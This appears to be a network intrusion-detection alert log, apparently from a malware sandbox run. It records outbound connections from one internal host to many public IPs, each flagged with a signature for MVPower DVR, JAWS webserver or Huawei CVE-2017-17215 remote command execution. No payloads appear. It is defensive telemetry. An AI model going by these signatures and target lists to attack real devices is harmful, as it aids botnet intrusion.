                                                          192.168.2.234.152.153.16453294802025883 01/02/24-06:23:55.535212TCP2025883ET EXPLOIT MVPower DVR Shell UCE5329480192.168.2.234.152.153.164
                                                          192.168.2.23107.22.7.9054290802030092 01/02/24-06:25:15.619385TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5429080192.168.2.23107.22.7.90
                                                          192.168.2.2367.212.162.8360502802025883 01/02/24-06:23:51.361230TCP2025883ET EXPLOIT MVPower DVR Shell UCE6050280192.168.2.2367.212.162.83
                                                          192.168.2.2345.63.78.7035444802025883 01/02/24-06:24:24.766885TCP2025883ET EXPLOIT MVPower DVR Shell UCE3544480192.168.2.2345.63.78.70
                                                          192.168.2.2334.107.170.11651938802030092 01/02/24-06:24:04.121161TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5193880192.168.2.2334.107.170.116
                                                          192.168.2.2318.176.244.12750336802025883 01/02/24-06:24:45.251137TCP2025883ET EXPLOIT MVPower DVR Shell UCE5033680192.168.2.2318.176.244.127
                                                          192.168.2.23194.8.215.9047106802025883 01/02/24-06:25:39.116051TCP2025883ET EXPLOIT MVPower DVR Shell UCE4710680192.168.2.23194.8.215.90
                                                          192.168.2.23104.230.152.22549976802030092 01/02/24-06:24:24.820851TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4997680192.168.2.23104.230.152.225
                                                          192.168.2.23104.92.147.4650912802030092 01/02/24-06:24:41.035412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5091280192.168.2.23104.92.147.46
                                                          192.168.2.2352.31.77.17848046802030092 01/02/24-06:25:05.043017TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4804680192.168.2.2352.31.77.178
                                                          192.168.2.23104.82.113.6149624802025883 01/02/24-06:23:55.139649TCP2025883ET EXPLOIT MVPower DVR Shell UCE4962480192.168.2.23104.82.113.61
                                                          192.168.2.2369.192.43.5855492802030092 01/02/24-06:25:21.993012TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5549280192.168.2.2369.192.43.58
                                                          192.168.2.2349.44.196.20855840802030092 01/02/24-06:24:41.307799TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5584080192.168.2.2349.44.196.208
                                                          192.168.2.23103.39.16.6847170802025883 01/02/24-06:24:15.125482TCP2025883ET EXPLOIT MVPower DVR Shell UCE4717080192.168.2.23103.39.16.68
                                                          192.168.2.232.21.48.24839876802025883 01/02/24-06:24:51.823067TCP2025883ET EXPLOIT MVPower DVR Shell UCE3987680192.168.2.232.21.48.248
                                                          192.168.2.23118.232.97.5137750802030092 01/02/24-06:24:56.010020TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3775080192.168.2.23118.232.97.51
                                                          192.168.2.23171.244.56.10744564802030092 01/02/24-06:24:03.532179TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4456480192.168.2.23171.244.56.107
                                                          192.168.2.23151.101.7.16645530802030092 01/02/24-06:23:49.491267TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4553080192.168.2.23151.101.7.166
                                                          192.168.2.2377.75.231.12448474802030092 01/02/24-06:23:59.226697TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4847480192.168.2.2377.75.231.124
                                                          192.168.2.23104.27.61.23650004802030092 01/02/24-06:24:48.847612TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5000480192.168.2.23104.27.61.236
                                                          192.168.2.2324.90.220.12451082802025883 01/02/24-06:25:34.883177TCP2025883ET EXPLOIT MVPower DVR Shell UCE5108280192.168.2.2324.90.220.124
                                                          192.168.2.2366.22.55.12933832802025883 01/02/24-06:23:51.506025TCP2025883ET EXPLOIT MVPower DVR Shell UCE3383280192.168.2.2366.22.55.129
                                                          192.168.2.23154.213.63.23060686802030092 01/02/24-06:24:37.365549TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6068680192.168.2.23154.213.63.230
                                                          192.168.2.232.17.176.1145384802025883 01/02/24-06:25:15.290469TCP2025883ET EXPLOIT MVPower DVR Shell UCE4538480192.168.2.232.17.176.11
                                                          192.168.2.2334.18.64.5447396802030092 01/02/24-06:24:30.779179TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4739680192.168.2.2334.18.64.54
                                                          192.168.2.23184.26.2.23933266802025883 01/02/24-06:25:32.158283TCP2025883ET EXPLOIT MVPower DVR Shell UCE3326680192.168.2.23184.26.2.239
                                                          192.168.2.23152.67.216.18058250802030092 01/02/24-06:24:09.004126TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5825080192.168.2.23152.67.216.180
                                                          192.168.2.2323.204.125.10656392802030092 01/02/24-06:24:13.920039TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5639280192.168.2.2323.204.125.106
                                                          192.168.2.23103.57.209.4560092802025883 01/02/24-06:25:10.115853TCP2025883ET EXPLOIT MVPower DVR Shell UCE6009280192.168.2.23103.57.209.45
                                                          192.168.2.23185.85.0.13949486802030092 01/02/24-06:24:38.209929TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4948680192.168.2.23185.85.0.139
                                                          192.168.2.2338.181.35.21934712802030092 01/02/24-06:24:09.179650TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3471280192.168.2.2338.181.35.219
                                                          192.168.2.23156.247.20.25537352372152829579 01/02/24-06:25:07.990796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735237215192.168.2.23156.247.20.255
                                                          192.168.2.23157.245.212.16341682802030092 01/02/24-06:24:14.930071TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4168280192.168.2.23157.245.212.163
                                                          192.168.2.23156.235.99.4053148372152829579 01/02/24-06:25:03.497246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314837215192.168.2.23156.235.99.40
                                                          192.168.2.2323.204.125.10656446802025883 01/02/24-06:24:14.743069TCP2025883ET EXPLOIT MVPower DVR Shell UCE5644680192.168.2.2323.204.125.106
                                                          192.168.2.2347.95.228.7335778802030092 01/02/24-06:24:59.105890TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3577880192.168.2.2347.95.228.73
                                                          192.168.2.23156.235.102.23034064372152835222 01/02/24-06:23:48.382924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406437215192.168.2.23156.235.102.230
                                                          192.168.2.2354.254.143.7760350802030092 01/02/24-06:23:58.484471TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6035080192.168.2.2354.254.143.77
                                                          192.168.2.23184.85.178.23639722802030092 01/02/24-06:25:16.029669TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3972280192.168.2.23184.85.178.236
                                                          192.168.2.2377.40.58.2351878802030092 01/02/24-06:25:02.046176TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5187880192.168.2.2377.40.58.23
                                                          192.168.2.23142.58.40.15445582802030092 01/02/24-06:24:23.995843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4558280192.168.2.23142.58.40.154
                                                          192.168.2.23156.234.219.23440728802025883 01/02/24-06:25:19.115031TCP2025883ET EXPLOIT MVPower DVR Shell UCE4072880192.168.2.23156.234.219.234
                                                          192.168.2.2323.222.136.16659240802030092 01/02/24-06:25:34.867652TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5924080192.168.2.2323.222.136.166
                                                          192.168.2.2377.246.183.3046272802030092 01/02/24-06:24:55.948920TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4627280192.168.2.2377.246.183.30
                                                          192.168.2.235.201.189.18145518802030092 01/02/24-06:25:25.755860TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4551880192.168.2.235.201.189.181
                                                          192.168.2.2373.116.187.14544290802025883 01/02/24-06:24:46.089608TCP2025883ET EXPLOIT MVPower DVR Shell UCE4429080192.168.2.2373.116.187.145
                                                          192.168.2.23156.254.103.5538508372152829579 01/02/24-06:24:27.790071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850837215192.168.2.23156.254.103.55
                                                          192.168.2.232.19.103.22048104802025883 01/02/24-06:25:04.208897TCP2025883ET EXPLOIT MVPower DVR Shell UCE4810480192.168.2.232.19.103.220
                                                          192.168.2.2318.154.143.21732888802030092 01/02/24-06:25:38.870167TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3288880192.168.2.2318.154.143.217
                                                          192.168.2.23174.84.210.335298802025883 01/02/24-06:25:31.914564TCP2025883ET EXPLOIT MVPower DVR Shell UCE3529880192.168.2.23174.84.210.3
                                                          192.168.2.23212.109.194.4333828802030092 01/02/24-06:24:23.748097TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3382880192.168.2.23212.109.194.43
                                                          192.168.2.2318.169.231.14560782802025883 01/02/24-06:24:54.905175TCP2025883ET EXPLOIT MVPower DVR Shell UCE6078280192.168.2.2318.169.231.145
                                                          192.168.2.2372.37.218.19948926802025883 01/02/24-06:24:05.713034TCP2025883ET EXPLOIT MVPower DVR Shell UCE4892680192.168.2.2372.37.218.199
                                                          192.168.2.23104.99.215.10858622802030092 01/02/24-06:24:54.969765TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5862280192.168.2.23104.99.215.108
                                                          192.168.2.23203.198.100.11341360802025883 01/02/24-06:25:25.334124TCP2025883ET EXPLOIT MVPower DVR Shell UCE4136080192.168.2.23203.198.100.113
                                                          192.168.2.2399.142.66.14860348802025883 01/02/24-06:25:29.576053TCP2025883ET EXPLOIT MVPower DVR Shell UCE6034880192.168.2.2399.142.66.148
                                                          192.168.2.23102.130.122.21740696802025883 01/02/24-06:24:58.885496TCP2025883ET EXPLOIT MVPower DVR Shell UCE4069680192.168.2.23102.130.122.217
                                                          192.168.2.23121.36.115.24947442802025883 01/02/24-06:23:55.420371TCP2025883ET EXPLOIT MVPower DVR Shell UCE4744280192.168.2.23121.36.115.249
                                                          192.168.2.2369.80.206.8755282802030092 01/02/24-06:24:19.154384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5528280192.168.2.2369.80.206.87
                                                          192.168.2.23156.77.130.17758998372152835222 01/02/24-06:24:06.202488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899837215192.168.2.23156.77.130.177
                                                          192.168.2.2334.196.134.24735922802030092 01/02/24-06:25:34.999781TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3592280192.168.2.2334.196.134.247
                                                          192.168.2.23139.59.72.23049116802025883 01/02/24-06:25:11.932825TCP2025883ET EXPLOIT MVPower DVR Shell UCE4911680192.168.2.23139.59.72.230
                                                          192.168.2.23206.233.253.22452608802025883 01/02/24-06:24:09.052927TCP2025883ET EXPLOIT MVPower DVR Shell UCE5260880192.168.2.23206.233.253.224
                                                          192.168.2.23221.153.44.20137018802030092 01/02/24-06:25:09.681419TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3701880192.168.2.23221.153.44.201
                                                          192.168.2.23116.203.70.2860376802025883 01/02/24-06:23:52.035635TCP2025883ET EXPLOIT MVPower DVR Shell UCE6037680192.168.2.23116.203.70.28
                                                          192.168.2.23173.234.100.23044204802030092 01/02/24-06:24:40.616364TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4420480192.168.2.23173.234.100.230
                                                          192.168.2.23166.161.129.1740674802030092 01/02/24-06:24:44.925325TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4067480192.168.2.23166.161.129.17
                                                          192.168.2.2351.210.89.5356836802025883 01/02/24-06:25:38.038524TCP2025883ET EXPLOIT MVPower DVR Shell UCE5683680192.168.2.2351.210.89.53
                                                          192.168.2.2323.57.78.17447542802030092 01/02/24-06:25:36.406858TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4754280192.168.2.2323.57.78.174
                                                          192.168.2.2361.220.62.14550398802025883 01/02/24-06:24:33.218083TCP2025883ET EXPLOIT MVPower DVR Shell UCE5039880192.168.2.2361.220.62.145
                                                          192.168.2.23213.136.91.1739410802030092 01/02/24-06:24:04.299968TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3941080192.168.2.23213.136.91.17
                                                          192.168.2.23170.130.122.6435776802025883 01/02/24-06:25:42.642200TCP2025883ET EXPLOIT MVPower DVR Shell UCE3577680192.168.2.23170.130.122.64
                                                          192.168.2.23154.204.118.16159748802030092 01/02/24-06:24:50.106168TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5974880192.168.2.23154.204.118.161
                                                          192.168.2.2386.181.28.25240796802030092 01/02/24-06:24:28.186813TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4079680192.168.2.2386.181.28.252
                                                          192.168.2.23101.42.248.24039924802025883 01/02/24-06:24:43.377309TCP2025883ET EXPLOIT MVPower DVR Shell UCE3992480192.168.2.23101.42.248.240
                                                          192.168.2.23156.254.94.2659154372152835222 01/02/24-06:25:03.334223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915437215192.168.2.23156.254.94.26
                                                          192.168.2.23183.111.183.23054570802025883 01/02/24-06:25:04.271400TCP2025883ET EXPLOIT MVPower DVR Shell UCE5457080192.168.2.23183.111.183.230
                                                          192.168.2.23108.186.100.20951226802030092 01/02/24-06:23:54.821481TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5122680192.168.2.23108.186.100.209
                                                          192.168.2.23208.109.68.2335052802030092 01/02/24-06:25:09.832341TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3505280192.168.2.23208.109.68.23
                                                          192.168.2.23185.18.81.6639906802030092 01/02/24-06:25:01.307707TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3990680192.168.2.23185.18.81.66
                                                          192.168.2.2313.227.73.8552698802025883 01/02/24-06:25:34.683145TCP2025883ET EXPLOIT MVPower DVR Shell UCE5269880192.168.2.2313.227.73.85
                                                          192.168.2.23156.254.85.3256952372152835222 01/02/24-06:25:03.334382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695237215192.168.2.23156.254.85.32
                                                          192.168.2.2346.4.102.25247674802030092 01/02/24-06:25:43.105983TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4767480192.168.2.2346.4.102.252
                                                          192.168.2.2399.16.143.12833176802030092 01/02/24-06:24:14.071830TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3317680192.168.2.2399.16.143.128
                                                          192.168.2.2338.181.35.21934372802025883 01/02/24-06:24:01.259878TCP2025883ET EXPLOIT MVPower DVR Shell UCE3437280192.168.2.2338.181.35.219
                                                          192.168.2.2323.48.76.9154442802025883 01/02/24-06:25:30.270726TCP2025883ET EXPLOIT MVPower DVR Shell UCE5444280192.168.2.2323.48.76.91
                                                          192.168.2.2383.148.198.4442066802030092 01/02/24-06:25:42.757624TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4206680192.168.2.2383.148.198.44
                                                          192.168.2.2334.120.145.3256908802025883 01/02/24-06:25:06.732120TCP2025883ET EXPLOIT MVPower DVR Shell UCE5690880192.168.2.2334.120.145.32
                                                          192.168.2.2334.225.232.16551466802030092 01/02/24-06:24:15.088251TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5146680192.168.2.2334.225.232.165
                                                          192.168.2.23104.121.24.21239268802030092 01/02/24-06:25:34.772506TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3926880192.168.2.23104.121.24.212
                                                          192.168.2.238.134.23.4358860802030092 01/02/24-06:24:27.781954TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5886080192.168.2.238.134.23.43
                                                          192.168.2.2351.255.91.12053876802025883 01/02/24-06:25:02.258701TCP2025883ET EXPLOIT MVPower DVR Shell UCE5387680192.168.2.2351.255.91.120
                                                          192.168.2.2374.48.45.14649620802030092 01/02/24-06:24:50.099124TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962080192.168.2.2374.48.45.146
                                                          192.168.2.2318.164.18.3348318802025883 01/02/24-06:25:38.054989TCP2025883ET EXPLOIT MVPower DVR Shell UCE4831880192.168.2.2318.164.18.33
                                                          192.168.2.2345.66.79.13355714802025883 01/02/24-06:24:14.281778TCP2025883ET EXPLOIT MVPower DVR Shell UCE5571480192.168.2.2345.66.79.133
                                                          192.168.2.2385.221.227.12437694802025883 01/02/24-06:24:18.042374TCP2025883ET EXPLOIT MVPower DVR Shell UCE3769480192.168.2.2385.221.227.124
                                                          192.168.2.23167.172.137.11148674802030092 01/02/24-06:23:49.370306TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4867480192.168.2.23167.172.137.111
                                                          192.168.2.23217.160.215.20551516802030092 01/02/24-06:24:23.994544TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5151680192.168.2.23217.160.215.205
                                                          192.168.2.23154.46.166.18836382802025883 01/02/24-06:24:10.948725TCP2025883ET EXPLOIT MVPower DVR Shell UCE3638280192.168.2.23154.46.166.188
                                                          192.168.2.23108.158.129.15660976802025883 01/02/24-06:24:55.937734TCP2025883ET EXPLOIT MVPower DVR Shell UCE6097680192.168.2.23108.158.129.156
                                                          192.168.2.2362.244.41.14754538802025883 01/02/24-06:25:25.284302TCP2025883ET EXPLOIT MVPower DVR Shell UCE5453880192.168.2.2362.244.41.147
                                                          192.168.2.23178.159.46.9149008802030092 01/02/24-06:25:39.173695TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4900880192.168.2.23178.159.46.91
                                                          192.168.2.23193.182.144.15439910802030092 01/02/24-06:25:31.359030TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3991080192.168.2.23193.182.144.154
                                                          192.168.2.23156.235.102.17138108372152829579 01/02/24-06:24:02.515190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810837215192.168.2.23156.235.102.171
                                                          192.168.2.2313.239.48.11535360802025883 01/02/24-06:24:04.056293TCP2025883ET EXPLOIT MVPower DVR Shell UCE3536080192.168.2.2313.239.48.115
                                                          192.168.2.2351.178.25.2639996802025883 01/02/24-06:25:19.073342TCP2025883ET EXPLOIT MVPower DVR Shell UCE3999680192.168.2.2351.178.25.26
                                                          192.168.2.2323.3.111.16147366802030092 01/02/24-06:25:43.020357TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4736680192.168.2.2323.3.111.161
                                                          192.168.2.23123.60.116.9758084802030092 01/02/24-06:24:45.347164TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5808480192.168.2.23123.60.116.97
                                                          192.168.2.23209.235.140.22455632802030092 01/02/24-06:24:48.911367TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5563280192.168.2.23209.235.140.224
                                                          192.168.2.2318.172.204.12456566802030092 01/02/24-06:24:59.388502TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5656680192.168.2.2318.172.204.124
                                                          192.168.2.232.20.206.6947260802025883 01/02/24-06:25:06.855559TCP2025883ET EXPLOIT MVPower DVR Shell UCE4726080192.168.2.232.20.206.69
                                                          192.168.2.2350.212.190.9749434802030092 01/02/24-06:25:07.021195TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4943480192.168.2.2350.212.190.97
                                                          192.168.2.23154.12.30.8341074802030092 01/02/24-06:25:38.407130TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4107480192.168.2.23154.12.30.83
                                                          192.168.2.2318.139.66.24949188802030092 01/02/24-06:24:49.080776TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4918880192.168.2.2318.139.66.249
                                                          192.168.2.23185.124.143.18839152802025883 01/02/24-06:23:52.102637TCP2025883ET EXPLOIT MVPower DVR Shell UCE3915280192.168.2.23185.124.143.188
                                                          192.168.2.23207.91.250.5347036802030092 01/02/24-06:24:05.701901TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4703680192.168.2.23207.91.250.53
                                                          192.168.2.23156.247.27.1551010372152829579 01/02/24-06:24:09.783413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101037215192.168.2.23156.247.27.15
                                                          192.168.2.2346.175.16.20649032802025883 01/02/24-06:24:48.996752TCP2025883ET EXPLOIT MVPower DVR Shell UCE4903280192.168.2.2346.175.16.206
                                                          192.168.2.23186.88.83.19454168802030092 01/02/24-06:25:15.957336TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5416880192.168.2.23186.88.83.194
                                                          192.168.2.23156.235.97.23040630372152829579 01/02/24-06:23:56.194246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.23156.235.97.230
                                                          192.168.2.2354.87.227.16435480802025883 01/02/24-06:25:22.000530TCP2025883ET EXPLOIT MVPower DVR Shell UCE3548080192.168.2.2354.87.227.164
                                                          192.168.2.23104.126.126.8152802802025883 01/02/24-06:25:30.150804TCP2025883ET EXPLOIT MVPower DVR Shell UCE5280280192.168.2.23104.126.126.81
                                                          192.168.2.2346.101.163.10735924802025883 01/02/24-06:25:11.820546TCP2025883ET EXPLOIT MVPower DVR Shell UCE3592480192.168.2.2346.101.163.107
                                                          192.168.2.2338.173.142.9934518802025883 01/02/24-06:24:45.911157TCP2025883ET EXPLOIT MVPower DVR Shell UCE3451880192.168.2.2338.173.142.99
                                                          192.168.2.23108.186.112.3448840802025883 01/02/24-06:24:54.992165TCP2025883ET EXPLOIT MVPower DVR Shell UCE4884080192.168.2.23108.186.112.34
                                                          192.168.2.2323.218.15.4344830802025883 01/02/24-06:24:34.799253TCP2025883ET EXPLOIT MVPower DVR Shell UCE4483080192.168.2.2323.218.15.43
                                                          192.168.2.23107.172.87.20751544802030092 01/02/24-06:24:55.853118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5154480192.168.2.23107.172.87.207
                                                          192.168.2.2387.106.240.16348362802025883 01/02/24-06:25:18.777402TCP2025883ET EXPLOIT MVPower DVR Shell UCE4836280192.168.2.2387.106.240.163
                                                          192.168.2.23124.160.184.25432982802030092 01/02/24-06:24:49.075744TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3298280192.168.2.23124.160.184.254
                                                          192.168.2.23158.94.0.20659592802030092 01/02/24-06:24:09.082311TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5959280192.168.2.23158.94.0.206
                                                          192.168.2.2334.242.70.14342204802030092 01/02/24-06:24:43.208181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4220480192.168.2.2334.242.70.143
                                                          192.168.2.23200.52.65.8038840802030092 01/02/24-06:25:07.011268TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3884080192.168.2.23200.52.65.80
                                                          192.168.2.23191.96.205.19456586802030092 01/02/24-06:24:13.903880TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5658680192.168.2.23191.96.205.194
                                                          192.168.2.2323.57.244.12937714802030092 01/02/24-06:25:07.005656TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3771480192.168.2.2323.57.244.129
                                                          192.168.2.2366.78.59.10240712802025883 01/02/24-06:25:15.619279TCP2025883ET EXPLOIT MVPower DVR Shell UCE4071280192.168.2.2366.78.59.102
                                                          192.168.2.23200.159.177.3149306802025883 01/02/24-06:24:11.224156TCP2025883ET EXPLOIT MVPower DVR Shell UCE4930680192.168.2.23200.159.177.31
                                                          192.168.2.2338.3.104.6048300802030092 01/02/24-06:25:07.011141TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4830080192.168.2.2338.3.104.60
                                                          192.168.2.23160.242.101.24957992802030092 01/02/24-06:24:49.569096TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5799280192.168.2.23160.242.101.249
                                                          192.168.2.23197.15.56.18050906802030092 01/02/24-06:24:01.084128TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5090680192.168.2.23197.15.56.180
                                                          192.168.2.2335.211.249.21148824802030092 01/02/24-06:24:30.918981TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4882480192.168.2.2335.211.249.211
                                                          192.168.2.23104.100.160.20360636802025883 01/02/24-06:25:11.730540TCP2025883ET EXPLOIT MVPower DVR Shell UCE6063680192.168.2.23104.100.160.203
                                                          192.168.2.23155.159.137.860496802025883 01/02/24-06:24:33.306234TCP2025883ET EXPLOIT MVPower DVR Shell UCE6049680192.168.2.23155.159.137.8
                                                          192.168.2.2323.63.254.14947840802025883 01/02/24-06:25:42.582550TCP2025883ET EXPLOIT MVPower DVR Shell UCE4784080192.168.2.2323.63.254.149
                                                          192.168.2.2331.41.88.1257330802030092 01/02/24-06:24:41.167214TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5733080192.168.2.2331.41.88.12
                                                          192.168.2.23169.53.132.23444342802030092 01/02/24-06:24:10.994021TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4434280192.168.2.23169.53.132.234
                                                          192.168.2.23156.247.18.9351712372152835222 01/02/24-06:23:49.692291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.23156.247.18.93
                                                          192.168.2.23143.0.84.21038402802025883 01/02/24-06:24:01.350138TCP2025883ET EXPLOIT MVPower DVR Shell UCE3840280192.168.2.23143.0.84.210
                                                          192.168.2.2394.237.51.5260554802030092 01/02/24-06:24:20.104130TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6055480192.168.2.2394.237.51.52
                                                          192.168.2.23109.196.234.1858414802030092 01/02/24-06:23:55.633320TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5841480192.168.2.23109.196.234.18
                                                          192.168.2.23172.67.227.649236802030092 01/02/24-06:24:30.712225TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4923680192.168.2.23172.67.227.6
                                                          192.168.2.2320.72.240.21243978802030092 01/02/24-06:24:23.654334TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4397880192.168.2.2320.72.240.212
                                                          192.168.2.2362.146.189.2848810802025883 01/02/24-06:25:38.026986TCP2025883ET EXPLOIT MVPower DVR Shell UCE4881080192.168.2.2362.146.189.28
                                                          192.168.2.2346.4.186.23653184802030092 01/02/24-06:24:54.906257TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5318480192.168.2.2346.4.186.236
                                                          192.168.2.23197.26.123.21538682802030092 01/02/24-06:25:36.163559TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3868280192.168.2.23197.26.123.215
                                                          192.168.2.235.135.156.633424802025883 01/02/24-06:25:30.155873TCP2025883ET EXPLOIT MVPower DVR Shell UCE3342480192.168.2.235.135.156.6
                                                          192.168.2.23119.77.165.6058400802025883 01/02/24-06:23:55.158684TCP2025883ET EXPLOIT MVPower DVR Shell UCE5840080192.168.2.23119.77.165.60
                                                          192.168.2.2318.223.213.8951292802030092 01/02/24-06:25:25.918831TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5129280192.168.2.2318.223.213.89
                                                          192.168.2.23104.82.158.9850494802025883 01/02/24-06:24:08.856573TCP2025883ET EXPLOIT MVPower DVR Shell UCE5049480192.168.2.23104.82.158.98
                                                          192.168.2.2343.192.122.6537722802025883 01/02/24-06:25:42.403229TCP2025883ET EXPLOIT MVPower DVR Shell UCE3772280192.168.2.2343.192.122.65
                                                          192.168.2.2320.94.161.14533044802025883 01/02/24-06:24:17.563871TCP2025883ET EXPLOIT MVPower DVR Shell UCE3304480192.168.2.2320.94.161.145
                                                          192.168.2.2335.209.88.19054520802030092 01/02/24-06:24:45.913931TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5452080192.168.2.2335.209.88.190
                                                          192.168.2.2359.49.86.22544734802030092 01/02/24-06:24:27.489026TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4473480192.168.2.2359.49.86.225
                                                          192.168.2.23184.27.51.3257188802030092 01/02/24-06:25:35.366173TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5718880192.168.2.23184.27.51.32
                                                          192.168.2.23176.119.158.21950988802025883 01/02/24-06:24:35.189037TCP2025883ET EXPLOIT MVPower DVR Shell UCE5098880192.168.2.23176.119.158.219
                                                          192.168.2.23104.23.98.20438590802030092 01/02/24-06:24:01.079300TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3859080192.168.2.23104.23.98.204
                                                          192.168.2.23156.253.47.15437722372152835222 01/02/24-06:24:59.013684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772237215192.168.2.23156.253.47.154
                                                          192.168.2.23110.161.237.5746168802025883 01/02/24-06:25:25.756167TCP2025883ET EXPLOIT MVPower DVR Shell UCE4616880192.168.2.23110.161.237.57
                                                          192.168.2.23115.110.175.3654248802025883 01/02/24-06:25:42.911184TCP2025883ET EXPLOIT MVPower DVR Shell UCE5424880192.168.2.23115.110.175.36
